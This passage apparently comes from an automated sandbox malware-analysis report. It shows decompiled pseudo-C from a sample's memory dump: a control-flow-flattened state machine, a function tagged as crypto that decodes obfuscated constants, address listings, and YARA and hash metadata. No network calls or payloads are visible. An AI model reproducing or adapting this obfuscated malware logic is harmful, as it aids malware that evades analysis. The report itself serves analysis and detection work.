							_t1363 = 0x2c30a4e;
							continue;
						}
						__eflags = _t1363 - 0xb2eac18;
						if(_t1363 == 0xb2eac18) {
							E0121243F();
							_t1171 = E01224C20();
							asm("sbb esi, esi");
							_t1363 = ( ~_t1171 & 0xf73dd2ef) + 0xc80f471;
							continue;
						}
						__eflags = _t1363 - 0xbef31e9;
						if(_t1363 != 0xbef31e9) {
							goto L112;
						}
						_t1171 = E012240FE(_v432, _v424, _v276, _v284);
						goto L64;
					}
					if(_t1401 == 0) {
						_t1171 = E01217EE7();
						_t1363 = 0x8ed2746;
						goto L1;
					}
					_t1402 = _t1363 - 0x5716cb5;
					if(_t1402 > 0) {
						__eflags = _t1363 - 0x895cfe1;
						if(__eflags > 0) {
							__eflags = _t1363 - 0x8ed2746;
							if(_t1363 == 0x8ed2746) {
								_t1171 = E01219824();
								__eflags = _t1171;
								if(__eflags == 0) {
									goto L64;
								}
								_t1363 = 0xf81dbfa;
								goto L1;
							}
							__eflags = _t1363 - 0x8eff62f;
							if(_t1363 == 0x8eff62f) {
								_t1171 = E0121AE43(_v96, _v576, _v584);
								_pop(_t1263);
								_t1363 = 0xd66928b;
								goto L1;
							}
							__eflags = _t1363 - 0x967876a;
							if(_t1363 == 0x967876a) {
								_t1171 = E0121F48A();
								_v72 = _t1171;
								_t1363 = 0xaf41e4a;
								goto L1;
							}
							__eflags = _t1363 - 0xa21c0cf;
							if(_t1363 != 0xa21c0cf) {
								goto L112;
							}
							_t1171 = E01223043();
							goto L64;
						}
						if(__eflags == 0) {
							__eflags = E01223782();
							if(__eflags == 0) {
								_t1171 = E01224C20();
								asm("sbb esi, esi");
								_t1363 = ( ~_t1171 & 0x09a56150) + 0x6441de0;
								goto L1;
							}
							_t1171 = E01224C20();
							asm("sbb esi, esi");
							_t1376 =  ~_t1171 & 0xf4af45bd;
							L24:
							_t1363 = _t1376 + 0xe6e64c4;
							goto L1;
						}
						__eflags = _t1363 - 0x590cd26;
						if(_t1363 == 0x590cd26) {
							_t1263 = _v524;
							_t1171 = E01231CDB( &_v12, _v444, _v360, _v224);
							_t1394 = _t1394 + 0xc;
							__eflags = _t1171;
							if(__eflags == 0) {
								_t1171 = _v32;
								__eflags = _t1171;
								if(_t1171 == 0) {
									E01212C02(_v140, _v216);
									_t1171 = _v32;
									_t1263 = _t1263;
								}
								__eflags = _t1171 - 1;
								if(__eflags == 0) {
									_t1171 = E01212C02(_v344, _v304);
									_t1263 = _t1263;
								}
							}
							_t1363 = 0xe36c2d0;
							goto L1;
						}
						__eflags = _t1363 - 0x6441de0;
						if(_t1363 == 0x6441de0) {
							_t1171 = E01214D1E();
							_t1363 = 0xc18aaa2;
							goto L1;
						}
						__eflags = _t1363 - 0x70f7fca;
						if(__eflags == 0) {
							_t1171 = _v368;
							_t1363 = 0xc29a4c8;
							_v68 = _t1171;
							goto L1;
						}
						__eflags = _t1363 - 0x7cc9194;
						if(_t1363 != 0x7cc9194) {
							goto L112;
						}
						_t1171 = E0121AA4E();
						_t1363 = 0x178de16;
						goto L1;
					}
					if(_t1402 == 0) {
						_t1171 = E012173BC();
						_v60 = _t1171;
						_t1363 = 0x967876a;
						goto L1;
					}
					_t1403 = _t1363 - 0x27efba3;
					if(_t1403 > 0) {
						__eflags = _t1363 - 0x2c30a4e;
						if(_t1363 == 0x2c30a4e) {
							_t1171 = E0122E579(_t1263);
							goto L64;
						}
						__eflags = _t1363 - 0x31daa81;
						if(_t1363 == 0x31daa81) {
							_t1171 = E0121A083();
							asm("sbb esi, esi");
							_t1376 =  ~_t1171 & 0xfd80cd25;
							__eflags = _t1376;
							goto L24;
						}
						__eflags = _t1363 - 0x3bec760;
						if(_t1363 == 0x3bec760) {
							_t1171 = E012159BF();
							_t1363 = 0xc80f471;
							goto L1;
						}
						__eflags = _t1363 - 0x434d78a;
						if(_t1363 != 0x434d78a) {
							goto L112;
						}
						_t1171 = E01232BE6(_v548,  &_v56, _v492, _v128);
						_pop(_t1263);
						_t1363 = 0xaf8f9d;
						goto L1;
					}
					if(_t1403 == 0) {
						_v80 = E01232AB2();
						_t1171 = E01232EE9(_v320, _v556, _v384, _t1191);
						_pop(_t1263);
						_v76 = _t1171;
						_t1363 = 0x5716cb5;
						goto L1;
					}
					if(_t1363 == 0x6cb694) {
						_t1171 = E012192C1();
						__eflags = _t1171;
						if(__eflags == 0) {
							goto L64;
						}
						_t1363 = 0xb2eac18;
						goto L1;
					}
					if(_t1363 == 0xaf8f9d) {
						_t1263 = _v436;
						_t1171 = E0122970A(_t1263,  &_v88,  &_v104, _v232, _v168);
						_t1394 = _t1394 + 0xc;
						asm("sbb esi, esi");
						_t1363 = ( ~_t1171 & 0x011691fa) + 0xd66928b;
						goto L1;
					}
					if(_t1363 == 0x178de16) {
						_v112 = E0122E899(_v508, 0x121150c, __eflags,  &_v108, _v268, _v280);
						_v120 = E0122E899(_v336, 0x121157c, __eflags,  &_v116, _v260, _v148);
						_t1199 = E0121B191( &_v112, _v468, _v408, _v580,  &_v120);
						asm("sbb esi, esi");
						_t1363 = ( ~_t1199 & 0x08e294fe) + 0x6bdaa1b;
						E0122629F(_v248, _v120, _v400, _v572, _v296);
						_t1263 = _v564;
						_t1171 = E0122629F(_t1263, _v112, _v240, _v500, _v136);
						_t1394 = _t1394 + 0x3c;
						goto L112;
					}
					if(_t1363 == 0x1c76b4f) {
						_t1171 = E01223D0C();
						asm("sbb esi, esi");
						_t1363 = ( ~_t1171 & 0x0382dac1) + 0x895cfe1;
						goto L1;
					}
					L112:
					__eflags = _t1363 - 0x6bdaa1b;
				} while (__eflags != 0);
				goto L64;
			}















































































































































































                          0x0121cf6e
                          0x0121cf74
                          0x0121cf7a
                          0x0121cf87
                          0x0121cf92
                          0x0121cf9d
                          0x0121cfa8
                          0x0121cfba
                          0x0121cfbf
                          0x0121cfc8
                          0x0121cfd0
                          0x0121cfd5
                          0x0121cfe0
                          0x0121cfeb
                          0x0121cff3
                          0x0121cffb
                          0x0121d000
                          0x0121d008
                          0x0121d010
                          0x0121d01b
                          0x0121d026
                          0x0121d031
                          0x0121d043
                          0x0121d048
                          0x0121d051
                          0x0121d05c
                          0x0121d067
                          0x0121d072
                          0x0121d07d
                          0x0121d088
                          0x0121d093
                          0x0121d09e
                          0x0121d0a6
                          0x0121d0b1
                          0x0121d0bc
                          0x0121d0c7
                          0x0121d0da
                          0x0121d0db
                          0x0121d0e2
                          0x0121d0ed
                          0x0121d0f8
                          0x0121d100
                          0x0121d10b
                          0x0121d11e
                          0x0121d125
                          0x0121d130
                          0x0121d144
                          0x0121d14b
                          0x0121d156
                          0x0121d161
                          0x0121d16c
                          0x0121d177
                          0x0121d182
                          0x0121d18a
                          0x0121d195
                          0x0121d1a0
                          0x0121d1ab
                          0x0121d1bb
                          0x0121d1c2
                          0x0121d1cd
                          0x0121d1d8
                          0x0121d1e3
                          0x0121d1ee
                          0x0121d1f9
                          0x0121d201
                          0x0121d20b
                          0x0121d210
                          0x0121d218
                          0x0121d220
                          0x0121d22b
                          0x0121d233
                          0x0121d23b
                          0x0121d246
                          0x0121d251
                          0x0121d25c
                          0x0121d264
                          0x0121d26c
                          0x0121d277
                          0x0121d28b
                          0x0121d290
                          0x0121d299
                          0x0121d2a4
                          0x0121d2af
                          0x0121d2be
                          0x0121d2c3
                          0x0121d2cc
                          0x0121d2d7
                          0x0121d2df
                          0x0121d2eb
                          0x0121d2f0
                          0x0121d2fb
                          0x0121d2fe
                          0x0121d302
                          0x0121d30a
                          0x0121d320
                          0x0121d327
                          0x0121d332
                          0x0121d33d
                          0x0121d34c
                          0x0121d34f
                          0x0121d356
                          0x0121d361
                          0x0121d36e
                          0x0121d372
                          0x0121d37a
                          0x0121d37f
                          0x0121d387
                          0x0121d38f
                          0x0121d397
                          0x0121d39f
                          0x0121d3a7
                          0x0121d3af
                          0x0121d3ba
                          0x0121d3c5
                          0x0121d3d0
                          0x0121d3db
                          0x0121d3e6
                          0x0121d3ee
                          0x0121d3f9
                          0x0121d401
                          0x0121d409
                          0x0121d411
                          0x0121d419
                          0x0121d421
                          0x0121d42b
                          0x0121d439
                          0x0121d43e
                          0x0121d444
                          0x0121d449
                          0x0121d451
                          0x0121d45c
                          0x0121d46f
                          0x0121d472
                          0x0121d481
                          0x0121d488
                          0x0121d493
                          0x0121d4a9
                          0x0121d4b0
                          0x0121d4bb
                          0x0121d4c6
                          0x0121d4d9
                          0x0121d4da
                          0x0121d4e1
                          0x0121d4e9
                          0x0121d4f4
                          0x0121d4ff
                          0x0121d512
                          0x0121d519
                          0x0121d524
                          0x0121d52f
                          0x0121d536
                          0x0121d541
                          0x0121d549
                          0x0121d54e
                          0x0121d556
                          0x0121d55b
                          0x0121d563
                          0x0121d56b
                          0x0121d573
                          0x0121d57b
                          0x0121d580
                          0x0121d588
                          0x0121d590
                          0x0121d598
                          0x0121d5a6
                          0x0121d5aa
                          0x0121d5b2
                          0x0121d5bd
                          0x0121d5c5
                          0x0121d5d0
                          0x0121d5db
                          0x0121d5ee
                          0x0121d5f5
                          0x0121d600
                          0x0121d60b
                          0x0121d616
                          0x0121d621
                          0x0121d629
                          0x0121d634
                          0x0121d63f
                          0x0121d647
                          0x0121d652
                          0x0121d65d
                          0x0121d670
                          0x0121d677
                          0x0121d682
                          0x0121d699
                          0x0121d69a
                          0x0121d6a1
                          0x0121d6ac
                          0x0121d6b7
                          0x0121d6c2
                          0x0121d6cd
                          0x0121d6d8
                          0x0121d6e0
                          0x0121d6eb
                          0x0121d6f3
                          0x0121d6fd
                          0x0121d701
                          0x0121d706
                          0x0121d70e
                          0x0121d719
                          0x0121d721
                          0x0121d72c
                          0x0121d737
                          0x0121d742
                          0x0121d74d
                          0x0121d758
                          0x0121d760
                          0x0121d768
                          0x0121d770
                          0x0121d778
                          0x0121d780
                          0x0121d796
                          0x0121d79d
                          0x0121d7a8
                          0x0121d7b3
                          0x0121d7c0
                          0x0121d7c4
                          0x0121d7cc
                          0x0121d7d4
                          0x0121d7dc
                          0x0121d7e7
                          0x0121d7ef
                          0x0121d7fa
                          0x0121d802
                          0x0121d80a
                          0x0121d80f
                          0x0121d817
                          0x0121d81f
                          0x0121d82a
                          0x0121d835
                          0x0121d840
                          0x0121d84b
                          0x0121d853
                          0x0121d85b
                          0x0121d866
                          0x0121d871
                          0x0121d879
                          0x0121d884
                          0x0121d88f
                          0x0121d897
                          0x0121d8a2
                          0x0121d8b5
                          0x0121d8c5
                          0x0121d8cc
                          0x0121d8d7
                          0x0121d8e2
                          0x0121d8ed
                          0x0121d8f5
                          0x0121d900
                          0x0121d90b
                          0x0121d916
                          0x0121d921
                          0x0121d92c
                          0x0121d937
                          0x0121d942
                          0x0121d94f
                          0x0121d95a
                          0x0121d968
                          0x0121d96d
                          0x0121d973
                          0x0121d97b
                          0x0121d980
                          0x0121d988
                          0x0121d993
                          0x0121d9a6
                          0x0121d9a9
                          0x0121d9b0
                          0x0121d9bb
                          0x0121d9c3
                          0x0121d9c8
                          0x0121d9d0
                          0x0121d9d8
                          0x0121d9e0
                          0x0121d9e8
                          0x0121d9ed
                          0x0121d9f1
                          0x0121d9fe
                          0x0121da02
                          0x0121da0a
                          0x0121da1d
                          0x0121da1e
                          0x0121da25
                          0x0121da2d
                          0x0121da38
                          0x0121da43
                          0x0121da4e
                          0x0121da55
                          0x0121da60
                          0x0121da68
                          0x0121da6d
                          0x0121da72
                          0x0121da7a
                          0x0121da82
                          0x0121da90
                          0x0121da94
                          0x0121daa1
                          0x0121daa5
                          0x0121daad
                          0x0121dab8
                          0x0121dac0
                          0x0121dacb
                          0x0121dad6
                          0x0121dade
                          0x0121daee
                          0x0121daf5
                          0x0121db00
                          0x0121db0b
                          0x0121db13
                          0x0121db1e
                          0x0121db29
                          0x0121db34
                          0x0121db3f
                          0x0121db4a
                          0x0121db55
                          0x0121db60
                          0x0121db6b
                          0x0121db76
                          0x0121db81
                          0x0121db8c
                          0x0121db97
                          0x0121dba4
                          0x0121dbaf
                          0x0121dbc3
                          0x0121dbc8
                          0x0121dbd1
                          0x0121dbdc
                          0x0121dbe7
                          0x0121dbf2
                          0x0121dbfd
                          0x0121dc08
                          0x0121dc13
                          0x0121dc1e
                          0x0121dc29
                          0x0121dc31
                          0x0121dc3c
                          0x0121dc44
                          0x0121dc4f
                          0x0121dc5a
                          0x0121dc65
                          0x0121dc70
                          0x0121dc7b
                          0x0121dc8d
                          0x0121dc90
                          0x0121dc97
                          0x0121dca2
                          0x0121dcad
                          0x0121dcb5
                          0x0121dcc0
                          0x0121dccb
                          0x0121dcd6
                          0x0121dcde
                          0x0121dce9
                          0x0121dcf4
                          0x0121dcfc
                          0x0121dd01
                          0x0121dd09
                          0x0121dd11
                          0x0121dd19
                          0x0121dd24
                          0x0121dd2c
                          0x0121dd3f
                          0x0121dd46
                          0x0121dd51
                          0x0121dd64
                          0x0121dd6b
                          0x0121dd76
                          0x0121dd81
                          0x0121dd94
                          0x0121dd9b
                          0x0121dda6
                          0x0121ddb1
                          0x0121ddb9
                          0x0121ddc4
                          0x0121ddcf
                          0x0121ddd7
                          0x0121ddde
                          0x0121dde9
                          0x0121ddf4
                          0x0121ddff
                          0x0121de0a
                          0x0121de15
                          0x0121de25
                          0x0121de2c
                          0x0121de37
                          0x0121de42
                          0x0121de4a
                          0x0121de55
                          0x0121de60
                          0x0121de6b
                          0x0121de78
                          0x0121de83
                          0x0121de8e
                          0x0121de99
                          0x0121dea4
                          0x0121deaf
                          0x0121deb7
                          0x0121debc
                          0x0121deca
                          0x0121decf
                          0x0121ded3
                          0x0121dedb
                          0x0121dee3
                          0x0121deeb
                          0x0121def3
                          0x0121def8
                          0x0121df00
                          0x0121df0b
                          0x0121df16
                          0x0121df21
                          0x0121df29
                          0x0121df2e
                          0x0121df33
                          0x0121df3b
                          0x0121df43
                          0x0121df4e
                          0x0121df59
                          0x0121df64
                          0x0121df6f
                          0x0121df85
                          0x0121df97
                          0x0121dfa0
                          0x0121dfab
                          0x0121dfb3
                          0x0121dfb8
                          0x0121dfc0
                          0x0121dfc8
                          0x0121dfd0
                          0x0121dfd8
                          0x0121dfdd
                          0x0121dfe2
                          0x0121dfe7
                          0x0121dfef
                          0x0121dff7
                          0x0121dfff
                          0x0121e007
                          0x0121e00f
                          0x0121e017
                          0x0121e01f
                          0x0121e027
                          0x0121e02f
                          0x0121e037
                          0x0121e03f
                          0x0121e04a
                          0x0121e055
                          0x0121e060
                          0x0121e06b
                          0x0121e076
                          0x0121e081
                          0x0121e08c
                          0x0121e097
                          0x0121e0a9
                          0x0121e0ac
                          0x0121e0b3
                          0x0121e0be
                          0x0121e0db
                          0x0121e0e0
                          0x0121e0e9
                          0x0121e0f6
                          0x0121e101
                          0x0121e113
                          0x0121e118
                          0x0121e121
                          0x0121e12c
                          0x0121e137
                          0x0121e150
                          0x0121e15b
                          0x0121e166
                          0x0121e179
                          0x0121e183
                          0x0121e18a
                          0x0121e195
                          0x0121e1a8
                          0x0121e1b7
                          0x0121e1be
                          0x0121e1c9
                          0x0121e1d1
                          0x0121e1d6
                          0x0121e1de
                          0x0121e1e6
                          0x0121e1ee
                          0x0121e1f9
                          0x0121e204
                          0x0121e20f
                          0x0121e222
                          0x0121e229
                          0x0121e234
                          0x0121e24a
                          0x0121e251
                          0x0121e25c
                          0x0121e267
                          0x0121e272
                          0x0121e27d
                          0x0121e288
                          0x0121e293
                          0x0121e2a5
                          0x0121e2a8
                          0x0121e2af
                          0x0121e2af
                          0x0121e2ba
                          0x0121e2ba
                          0x0121e2ba
                          0x0121e2ba
                          0x0121e2c0
                          0x00000000
                          0x00000000
                          0x0121e7a0
                          0x0121e7a6
                          0x0121e9f2
                          0x0121e9f8
                          0x0121eafb
                          0x0121eb01
                          0x0121eb77
                          0x0121eb79
                          0x0121eb85
                          0x00000000
                          0x0121eb85
                          0x0121eb7b
                          0x00000000
                          0x0121eb7b
                          0x0121eb03
                          0x0121eb09
                          0x0121eb37
                          0x0121eb43
                          0x0121eb4f
                          0x0121eb64
                          0x0121e914
                          0x0121e914
                          0x0121e915
                          0x00000000
                          0x0121e915
                          0x0121eb0b
                          0x0121eb11
                          0x00000000
                          0x00000000
                          0x0121eb1a
                          0x0121eb1f
                          0x00000000
                          0x0121eb1f
                          0x0121e9fe
                          0x0121eae4
                          0x0121eae9
                          0x0121eaeb
                          0x0121e810
                          0x0121e817
                          0x0121e817
                          0x0121eaf1
                          0x00000000
                          0x0121eaf1
                          0x0121ea04
                          0x0121ea0a
                          0x0121eac7
                          0x0121eacc
                          0x00000000
                          0x0121eacc
                          0x0121ea10
                          0x0121ea16
                          0x0121ea69
                          0x0121ea7d
                          0x0121eaa1
                          0x0121eaa6
                          0x0121eaad
                          0x0121eab5
                          0x00000000
                          0x0121eab5
                          0x0121ea18
                          0x0121ea1e
                          0x0121ea51
                          0x00000000
                          0x0121ea51
                          0x0121ea20
                          0x0121ea26
                          0x00000000
                          0x00000000
                          0x0121ea3a
                          0x0121ea3f
                          0x0121ea41
                          0x00000000
                          0x00000000
                          0x0121ea47
                          0x00000000
                          0x0121ea47
                          0x0121e7ac
                          0x0121e9d8
                          0x0121e9dd
                          0x0121e9df
                          0x0121e9e8
                          0x0121e9e8
                          0x0121e96b
                          0x0121e96b
                          0x00000000
                          0x0121e96b
                          0x0121e7b2
                          0x0121e7b8
                          0x0121e8d1
                          0x0121e8d7
                          0x0121e9b5
                          0x0121e9bc
                          0x0121e9be
                          0x00000000
                          0x0121e9be
                          0x0121e8dd
                          0x0121e8e3
                          0x0121e9a6
                          0x0121e9ab
                          0x00000000
                          0x0121e9ab
                          0x0121e8e9
                          0x0121e8ef
                          0x0121e93b
                          0x0121e941
                          0x0121e942
                          0x0121e944
                          0x0121e975
                          0x0121e97c
                          0x0121e97f
                          0x0121e98b
                          0x0121e98d
                          0x0121e994
                          0x0121e994
                          0x00000000
                          0x0121e994
                          0x0121e98f
                          0x0121e992
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0121e992
                          0x0121e981
                          0x00000000
                          0x0121e981
                          0x0121e960
                          0x0121e966
                          0x0121e967
                          0x0121e969
                          0x00000000
                          0x0121e969
                          0x0121e8f1
                          0x0121e8f7
                          0x00000000
                          0x00000000
                          0x0121e90f
                          0x00000000
                          0x0121e90f
                          0x0121e7be
                          0x0121e8c2
                          0x0121e8c7
                          0x00000000
                          0x0121e8c7
                          0x0121e7c4
                          0x0121e7ca
                          0x0121e8a1
                          0x0121e8a6
                          0x0121e8ad
                          0x00000000
                          0x0121e8ad
                          0x0121e7d0
                          0x0121e7d6
                          0x0121e848
                          0x0121e84c
                          0x0121e893
                          0x0121e893
                          0x00000000
                          0x0121e893
                          0x0121e86c
                          0x0121e872
                          0x0121e873
                          0x0121e87a
                          0x0121e88e
                          0x00000000
                          0x0121e88e
                          0x0121e87c
                          0x00000000
                          0x0121e87c
                          0x0121e7d8
                          0x0121e7de
                          0x0121e81c
                          0x0121e82c
                          0x0121e835
                          0x0121e83d
                          0x00000000
                          0x0121e83d
                          0x0121e7e0
                          0x0121e7e6
                          0x00000000
                          0x00000000
                          0x0121e808
                          0x00000000
                          0x0121e80d
                          0x0121e2c6
                          0x0121e791
                          0x0121e796
                          0x00000000
                          0x0121e796
                          0x0121e2cc
                          0x0121e2d2
                          0x0121e576
                          0x0121e57c
                          0x0121e6f0
                          0x0121e6f6
                          0x0121e773
                          0x0121e778
                          0x0121e77a
                          0x00000000
                          0x00000000
                          0x0121e780
                          0x00000000
                          0x0121e780
                          0x0121e6f8
                          0x0121e6fe
                          0x0121e75c
                          0x0121e761
                          0x0121e762
                          0x00000000
                          0x0121e762
                          0x0121e700
                          0x0121e706
                          0x0121e737
                          0x0121e73c
                          0x0121e743
                          0x00000000
                          0x0121e743
                          0x0121e708
                          0x0121e70e
                          0x00000000
                          0x00000000
                          0x0121e722
                          0x00000000
                          0x0121e722
                          0x0121e582
                          0x0121e6a1
                          0x0121e6a3
                          0x0121e6d4
                          0x0121e6dd
                          0x0121e6e5
                          0x00000000
                          0x0121e6e5
                          0x0121e6b3
                          0x0121e6bc
                          0x0121e6be
                          0x0121e551
                          0x0121e551
                          0x00000000
                          0x0121e551
                          0x0121e588
                          0x0121e58e
                          0x0121e60d
                          0x0121e611
                          0x0121e616
                          0x0121e619
                          0x0121e61b
                          0x0121e626
                          0x0121e62d
                          0x0121e62f
                          0x0121e64e
                          0x0121e656
                          0x0121e65d
                          0x0121e65d
                          0x0121e65e
                          0x0121e661
                          0x0121e680
                          0x0121e686
                          0x0121e687
                          0x0121e661
                          0x0121e68b
                          0x00000000
                          0x0121e68b
                          0x0121e590
                          0x0121e596
                          0x0121e5e2
                          0x0121e5e7
                          0x00000000
                          0x0121e5e7
                          0x0121e598
                          0x0121e59e
                          0x0121e5c3
                          0x0121e5ca
                          0x0121e5cf
                          0x00000000
                          0x0121e5cf
                          0x0121e5a0
                          0x0121e5a6
                          0x00000000
                          0x00000000
                          0x0121e5b4
                          0x0121e5b9
                          0x00000000
                          0x0121e5b9
                          0x0121e2d8
                          0x0121e560
                          0x0121e565
                          0x0121e56c
                          0x00000000
                          0x0121e56c
                          0x0121e2de
                          0x0121e2e4
                          0x0121e4d1
                          0x0121e4d7
                          0x0121eba2
                          0x00000000
                          0x0121eba2
                          0x0121e4dd
                          0x0121e4e3
                          0x0121e540
                          0x0121e549
                          0x0121e54b
                          0x0121e54b
                          0x00000000
                          0x0121e54b
                          0x0121e4e5
                          0x0121e4eb
                          0x0121e523
                          0x0121e528
                          0x00000000
                          0x0121e528
                          0x0121e4ed
                          0x0121e4ef
                          0x00000000
                          0x00000000
                          0x0121e50b
                          0x0121e511
                          0x0121e512
                          0x00000000
                          0x0121e512
                          0x0121e2ea
                          0x0121e4b2
                          0x0121e4b9
                          0x0121e4bf
                          0x0121e4c0
                          0x0121e4c7
                          0x00000000
                          0x0121e4c7
                          0x0121e2f6
                          0x0121e475
                          0x0121e47a
                          0x0121e47c
                          0x00000000
                          0x00000000
                          0x0121e482
                          0x00000000
                          0x0121e482
                          0x0121e302
                          0x0121e440
                          0x0121e44f
                          0x0121e454
                          0x0121e45b
                          0x0121e463
                          0x00000000
                          0x0121e463
                          0x0121e30e
                          0x0121e366
                          0x0121e397
                          0x0121e3bf
                          0x0121e3cb
                          0x0121e3de
                          0x0121e3f9
                          0x0121e41a
                          0x0121e41e
                          0x0121e423
                          0x00000000
                          0x0121e423
                          0x0121e316
                          0x0121e323
                          0x0121e32c
                          0x0121e334
                          0x00000000
                          0x0121e334
                          0x0121eb8a
                          0x0121eb8a
                          0x0121eb8a
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: On$!+$#oT$$cP$(<$(M&$2=q$;#$;-r$;O\$O=/{$P8$PV$S4$Xr$]sg$p3%$tfZ$x1L$yT$yd$"R$`o$|$[a
                          • API String ID: 0-2511783560
                          • Opcode ID: e1f759748e5ff2458b6853931b4e949c1f2e4fe15737ccfd75f0a0a03fd78275
                          • Instruction ID: 1e9e691f54d5eb0b32258b48dd4e156b9f301de4c1e39ea81f03a068d48f6c63
                          • Opcode Fuzzy Hash: e1f759748e5ff2458b6853931b4e949c1f2e4fe15737ccfd75f0a0a03fd78275
                          • Instruction Fuzzy Hash: C0D223719193818BD379CF24C98A6DFBBE1BBE5304F11891DD9C996260DBB08949CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01227445, Relevance: 26.9, Strings: 21, Instructions: 669COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E01227445(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				void* _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				void* _t756;
				void* _t757;
				void* _t759;
				void* _t766;
				void* _t775;
				void* _t777;
				void* _t779;
				char _t780;
				void* _t783;
				void* _t788;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t798;
				signed int _t799;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				void* _t805;
				void* _t831;
				void* _t867;
				void* _t888;
				signed int _t890;
				signed int _t891;
				void* _t892;
				void* _t896;
				void* _t897;
				void* _t899;
				void* _t902;

				_v92 = 0x6a655a;
				_v96 = __ecx;
				asm("stosd");
				_t890 = 0x46;
				asm("stosd");
				_t896 = 0;
				_t794 = 0x14;
				_t788 = 0x6b38845;
				asm("stosd");
				_v200 = 0x9666ef;
				_v200 = _v200 ^ 0x24560381;
				_v200 = _v200 ^ 0x24c0656e;
				_v392 = 0x2bbe5e;
				_v392 = _v392 << 4;
				_v392 = _v392 ^ 0x74c8326b;
				_v392 = _v392 / _t890;
				_v392 = _v392 ^ 0x01b1329f;
				_v284 = 0x4b28c5;
				_v284 = _v284 << 9;
				_v284 = _v284 + 0xffff1ae6;
				_v284 = _v284 ^ 0x9650a4e6;
				_v244 = 0xb0e026;
				_v244 = _v244 / _t794;
				_v244 = _v244 >> 0xd;
				_v244 = _v244 ^ _t890;
				_v160 = 0x7e7851;
				_t41 =  &_v160; // 0x7e7851
				_t891 = 0x21;
				_v160 =  *_t41 / _t891;
				_v160 = _v160 ^ 0x0003d519;
				_v368 = 0xb104a1;
				_t795 = 0x51;
				_v368 = _v368 / _t795;
				_v368 = _v368 >> 1;
				_t796 = 0x6f;
				_v368 = _v368 / _t796;
				_v368 = _v368 ^ 0x00000285;
				_v316 = 0x387e5;
				_v316 = _v316 + 0xffff69ce;
				_v316 = _v316 + 0x4c7c;
				_v316 = _v316 ^ 0x00033e2f;
				_v356 = 0x4c72a9;
				_v356 = _v356 << 0xb;
				_v356 = _v356 + 0x75e5;
				_v356 = _v356 ^ 0x3a51d26c;
				_v356 = _v356 ^ 0x59c46f89;
				_v416 = 0x3106bc;
				_v416 = _v416 | 0x4bdd89b8;
				_v416 = _v416 + 0xffff59cb;
				_v416 = _v416 ^ 0x45ebab58;
				_v416 = _v416 ^ 0x0e1742df;
				_v408 = 0xe4e21d;
				_v408 = _v408 + 0x41c9;
				_v408 = _v408 + 0xffffceea;
				_v408 = _v408 >> 3;
				_v408 = _v408 ^ 0x001c9e5a;
				_v312 = 0xbaac90;
				_v312 = _v312 | 0x0f8421e4;
				_v312 = _v312 ^ 0x27b39492;
				_v312 = _v312 ^ 0x280d3966;
				_v352 = 0xe996e6;
				_v352 = _v352 ^ 0xda5b0707;
				_v352 = _v352 + 0xffff09bb;
				_v352 = _v352 + 0xffff1acb;
				_v352 = _v352 ^ 0xdab0b667;
				_v288 = 0xd96555;
				_v288 = _v288 ^ 0x489ae580;
				_t797 = 0x25;
				_v288 = _v288 * 0x7a;
				_v288 = _v288 ^ 0x702b0b9a;
				_v128 = 0xcc4c9e;
				_v128 = _v128 ^ 0x36280e35;
				_v128 = _v128 ^ 0x36eb8fbe;
				_v296 = 0xf43a7b;
				_v296 = _v296 * 0x6e;
				_v296 = _v296 + 0xffffe0a1;
				_v296 = _v296 ^ 0x68f04a04;
				_v120 = 0xe04b3a;
				_t136 =  &_v120; // 0xe04b3a
				_v120 =  *_t136 * 0x39;
				_v120 = _v120 ^ 0x31f6dcc4;
				_v280 = 0xc2590;
				_v280 = _v280 / _t797;
				_t798 = 0x50;
				_v280 = _v280 * 0x4e;
				_v280 = _v280 ^ 0x00101627;
				_v148 = 0x1749f;
				_v148 = _v148 << 8;
				_v148 = _v148 ^ 0x017a8570;
				_v184 = 0xe8f483;
				_v184 = _v184 + 0xffff6ca6;
				_v184 = _v184 ^ 0x00ea3c70;
				_v192 = 0x6adbc4;
				_v192 = _v192 / _t798;
				_v192 = _v192 ^ 0x0001675e;
				_v272 = 0x34a752;
				_v272 = _v272 + 0xffff24c3;
				_v272 = _v272 | 0x6b4c91bc;
				_v272 = _v272 ^ 0x6b7105bd;
				_v248 = 0x62e7a0;
				_v248 = _v248 ^ 0x3f642788;
				_t799 = 0x6e;
				_v248 = _v248 * 0x68;
				_v248 = _v248 ^ 0x9abf14c2;
				_v176 = 0x9420ee;
				_v176 = _v176 / _t799;
				_v176 = _v176 ^ 0x000615dd;
				_v256 = 0x2eb359;
